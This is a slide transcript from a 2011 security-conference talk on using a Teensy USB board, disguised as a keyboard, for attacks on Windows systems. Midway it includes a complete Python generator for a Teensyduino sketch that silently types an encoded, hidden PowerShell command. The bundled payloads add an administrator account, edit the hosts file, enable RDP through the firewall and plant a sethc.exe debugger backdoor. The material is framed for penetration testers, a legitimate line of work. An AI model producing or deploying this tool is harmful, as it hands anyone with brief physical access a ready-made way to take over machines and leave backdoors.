Mere Paas Teensy Hai, or Compromising a Highly Secure Environment Part 2
Nikhil Mittal (SamratAshok)

DESCRIPTION

ClubHack 2011 Hacking and Security Conference. Talk: Mere Paas Teensy Hai. Speaker: Nikhil Mittal

Page 1: Mere Paas Teensy Hai (Nikhil Mittal)

MERE PAAS TEENSY HAI
OR
COMPROMISING A HIGHLY SECURE ENVIRONMENT PART 2

Nikhil Mittal (SamratAshok)

Page 2:

ABOUT ME

SamratAshok

Twitter - @nikhil_mitt

Penetration Tester with PwC India

I am interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.

Creator of Kautilya and Maareech

Previous Talks

Ultimate Pen Testing: Compromising a highly secure environment Clubhack’10

Here are your Keystrokes Hackfest’11

Upcoming Talks

Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11

Page 3:

OVERVIEW

Why the Title?

Current State of Pentesting

Questions being raised to us

The answer to the questions

What’s done

What we will do

Limitations

Future

Conclusion

Page 4:

WHY THE TITLE? (Mere Paas Teensy Hai is Hindi for “I have a Teensy”)

What I told the ClubHack team: I talked about compromising a highly secure environment last year, so let’s continue with the pwnage!! Thanks to the team for buying that and allowing me to speak.

The real reason:

Page 5:
Page 6:

A TYPICAL PEN TEST SCENARIO

A client engagement comes with IP addresses.

We need to complete the assignment in a very restrictive time frame.

Pressure is on us to deliver a “good” report with some high severity findings (the “High” that comes inside a red-coloured box).

Page 7:

CURRENT STATE OF PENTESTING

Vuln Scan -> Exploit -> Report

Page 8:

This is the best-case scenario. Only the lucky ones find that.

Generally, legacy enterprise applications or business-critical applications are not upgraded.

There is almost no fun doing it that way.

Page 9:

SOME OF US DO IT BETTER

Enum -> Scan -> Exploit -> Report

Page 10:

SOME OF US DO IT EVEN BETTER

Enum + Intel -> Scan -> Exploit -> Post Exp -> Report

Page 11:

WHY DO WE NEED TO EXPLOIT?

To gain access to the systems.

This shows the real threat to clients: that we can actually make an impact on their business. No more “so-what”.

We can create reports with “High” Severity findings.

<Audience>

Page 12:

WHAT DO WE EXPLOIT?

Memory Corruption bugs.
  Server side
  Client side

Humans

Mis-configurations

Design Problems

<Audience>

Page 13:

QUESTIONS BEING RAISED TO US

Many times we get some vulnerabilities but can’t exploit them:

No public exploits available.

Not allowed on the system.

Countermeasure blocking it.

Exploit completed but no session was generated :P

Kya hai tumhare paas? (What do you have?)

Page 14:

QUESTIONS BEING RAISED TO US

Hardened Systems

Patches in place

Countermeasures blocking scans and exploits

Security incident monitoring and blocking

Kya hai tumhare paas? (What do you have?)

Page 15:

QUESTIONS BEING RAISED TO US

Just a bad day.

Exploit completed but no session was generated :P

Kya hai tumhare paas? (What do you have?)

Page 16:

ALTERNATIVES

Open file shares.

Sticky slips (passwords on sticky notes).

Social Engineering attacks.

Man In The Middle (many types)

SMB Relay

<Audience>

Page 17:

THE ANSWER TO THE QUESTIONS

TEENSY

A USB micro-controller development board.

We will use the Teensy++, the larger variant of the Teensy (more flash, RAM and I/O pins).

Available for $24 from pjrc.com

Mere paas Teensy hai (I have a Teensy)

Page 18:

USING TEENSY

Find an unattended system and insert the Teensy device into a USB port.

Fool your victim by disguising it as a mouse, USB toy, thumb drive etc.

Generally Teensy needs just a minute to complete the job.

You can program it according to your needs.

Because it enumerates as a USB keyboard (HID) rather than as storage, it is generally neither detected by antivirus nor blocked by USB mass-storage restrictions: Teensy works great for popping shells.

Page 19:

WHAT’S DONE

Arduino-based attack vector in the Social Engineering Toolkit (SET) by David Kennedy.

Contains some really awesome payloads.

Almost all payloads are for popping shells.

Page 20:

WHAT WE WILL DO

Teensy can be used for much more than popping shells.

It can be used to perform pre- and post-exploitation.

We will have a detailed look at some of these payloads and will understand how to create payloads as per our needs.

Page 21:

DESCRIPTION OF PAYLOADS

Mostly for Windows, since desktops are generally Windows-based.

Payloads vary from one-line commands to powerful scripts.

If you know PowerShell scripting, the payloads will make more sense and will be easier to customize.

Page 22:

DEMO

Page 23:

WINDOWS USER ADD

Page 24:
Page 25:
Page 26:
Page 27:

THANK YOU

Page 28:

DEFAULT DNS

Page 29:

EDIT HOSTS FILE

Page 30:

ENABLE RDP

Page 31:

BUT

What if even Teensy doesn’t work, with the other options already not working?

What if the USB ports are ripped off?

Would it be impossible to pwn such an environment?

Page 32:
Page 33:

ENABLE TELNET

Page 34:

FORCEFUL BROWSING

Page 35:

DOWNLOAD AND EXECUTE

Page 36:

SETHC AND UTILMAN BACKDOOR

Page 37:

UNINSTALL APPLICATION

Page 38:

REGISTRY EXPORT

Page 39:

TWEET

Page 40:

HASHDUMP

Page 41:

CODE EXECUTION

Page 42:

KEYLOGGING
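
The demo slides above (Windows user add, edit hosts file, enable RDP, sethc and utilman backdoor, and so on) and the earlier “Using Teensy” and “Description of payloads” slides all rest on one mechanism: the Teensy enumerates as a USB keyboard and blindly types a command into the host. The following is an added example, written for this page rather than taken from Kautilya, SET or the talk, of a small Python generator that turns a PowerShell one-liner into a Teensyduino sketch doing exactly that. It assumes the Teensyduino Keyboard API (Keyboard.set_modifier / set_key1 / send_now, MODIFIERKEY_GUI, KEY_R, Keyboard.print / println accepting F() flash-string literals), an assumed conservative length limit for the Run dialog, and invented payload strings (the account name, password, host name and the 203.0.113.10 address are made up). The security-relevant choice it demonstrates is to hand the script over with -EncodedCommand, so the device only ever types base64 and no quotes, pipes or redirection characters can be mangled by the Run box, cmd.exe or a non-US keyboard layout; when the encoded line is too long for the Run box it opens a cmd.exe console and types the line there instead.

```python
"""Generate a Teensyduino keyboard sketch that types a PowerShell payload.

Added example, not code from Kautilya, SET or the talk.  Assumptions: the
Teensyduino Keyboard API (Keyboard.set_modifier / set_key1 / send_now /
print / println, MODIFIERKEY_GUI, KEY_R, F() flash-string literals), the
Run-box length limit below, and the made-up payload strings.
"""
import base64

# Constructed PowerShell one-liners matching the demo slide titles.  Account,
# password, host name and address are invented for this example.
PAYLOADS = {
    "user_add": (
        "net user teensy 'Cl0bH4ck!2011' /add; "
        "net localgroup Administrators teensy /add"
    ),
    "hosts_edit": (
        "Add-Content \"$env:SystemRoot\\System32\\drivers\\etc\\hosts\" "
        "'203.0.113.10 update.example.com'"
    ),
    "enable_rdp": (
        "Set-ItemProperty 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' "
        "-Name fDenyTSConnections -Value 0; "
        "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes"
    ),
    "sethc_backdoor": (
        "reg add 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
        "Image File Execution Options\\sethc.exe' "
        "/v Debugger /t REG_SZ /d 'C:\\Windows\\System32\\cmd.exe' /f"
    ),
}

RUN_BOX_LIMIT = 250   # assumed conservative length limit of the Run dialog's edit box
CHUNK = 120           # characters per Keyboard.print(F("...")) call in the sketch


def encode_command(script):
    """Base64 of the UTF-16LE script, the form powershell.exe -EncodedCommand expects.

    Encoding the script means the sketch only ever types [A-Za-z0-9+/=]: no
    quotes, pipes or redirection characters for the Run box, cmd.exe or a
    non-US keyboard layout to mangle."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded):
    """Inverse of encode_command; lets you review what the host will actually run."""
    return base64.b64decode(encoded).decode("utf-16-le")


def c_literal(text):
    """Escape text as a C/C++ double-quoted string literal for the sketch."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def key_combo(modifier, key):
    """Press modifier+key, then release both (Teensyduino raw-key API)."""
    return [
        "  Keyboard.set_modifier(%s);" % modifier,
        "  Keyboard.set_key1(%s);" % key,
        "  Keyboard.send_now();",
        "  Keyboard.set_modifier(0);",
        "  Keyboard.set_key1(0);",
        "  Keyboard.send_now();",
    ]


def type_line(text):
    """Type text in flash-resident chunks (F()), then press Enter.  The
    Teensy++ 2.0 has only 8 KB of RAM, so long literals must stay in flash."""
    lines = ["  Keyboard.print(F(%s));" % c_literal(text[i:i + CHUNK])
             for i in range(0, len(text), CHUNK)]
    return lines + ["  Keyboard.println();"]


def powershell_line(script):
    """The one line the device types: hidden, non-interactive, no profile."""
    return "powershell -NoP -NonI -W Hidden -Enc " + encode_command(script)


def build_sketch(script, settle_ms=5000):
    """Return the Arduino sketch source.  Everything is blind: the device gets
    no feedback from the host, so each step is followed by a fixed delay."""
    cmd = powershell_line(script)
    lines = ["void setup() {",
             "  delay(%d);  // wait for the host to enumerate the new keyboard" % settle_ms,
             "  // Win+R: open the Run dialog"]
    lines += key_combo("MODIFIERKEY_GUI", "KEY_R")
    lines.append("  delay(1000);")
    if len(cmd) <= RUN_BOX_LIMIT:
        lines += type_line(cmd)
    else:
        # Long encoded scripts overflow the Run box: open a console instead,
        # background the PowerShell line with start, then close the console.
        lines += type_line("cmd")
        lines.append("  delay(1500);")
        lines += type_line("start " + cmd)
        lines.append("  delay(500);")
        lines += type_line("exit")
    lines += ["}", "", "void loop() {", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print(build_sketch(PAYLOADS["user_add"]))
```

Redirect the output into a .ino file, select “Keyboard” as the USB type in Teensyduino and flash it. Three caveats a tester should check on a matching VM before an engagement: the Teensy sends US scancodes, so on a non-US layout even the base64 characters `+`, `/` and `=` can come out wrong; all four sample payloads need an elevated PowerShell, which Win+R does not give you on a UAC-enabled machine, so they fail silently there; and because the traffic is one-way, the only way to know the delays are long enough is to try them on the target build.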

Page 43:

LIMITATIONS

Limited storage on the Teensy. Resolved if you attach an SD card to the Teensy.

Inability to “read” from the system: the device is a keyboard, so traffic is one-way only and you have to assume how the victim OS responds (and wait long enough for it).

Page 44:

FUTURE

Kautilya

Improvement in current payloads.

New payloads for non-traditional shells.

Dropping executables using additional storage (already done).

Page 45:

CONCLUSION

If used wisely, Teensy can be used as a complete penetration testing device, though with its own limitations.

It’s a cheap device, so use it.

Please use Kautilya and give feedback after it is released.

Mere paas Teensy hai (I have a Teensy)

Page 46:

THANK YOU

Questions?

Insults?

Feedback?